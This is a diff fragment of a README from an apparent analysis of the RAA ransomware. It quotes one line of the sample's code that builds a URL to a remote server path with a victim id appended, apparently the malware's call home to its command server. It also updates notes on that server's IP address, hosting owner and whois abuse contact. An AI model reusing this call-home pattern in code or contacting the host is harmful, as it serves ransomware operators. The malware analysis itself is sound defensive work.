bl4de/research/raa-ransomware-analysis/README.md

 MOSKn[0] = "http://startwavenow.com/cmh" + "/mars.php?id=" + VuSD;
 ```

-Server IP address (188.40.248.65) is a part of a network located in Germany (?), registered by
+Server IP address (188.40.248.65) is a part of a network located in Germany (?), owned by Romanian hosting company THC Projects.
+Those information were valid on 14.07.2016, when this part of my writeup was created.

 ```

 % Abuse contact for '188.40.248.64 - 188.40.248.95' is 'abuse@hetzner.de'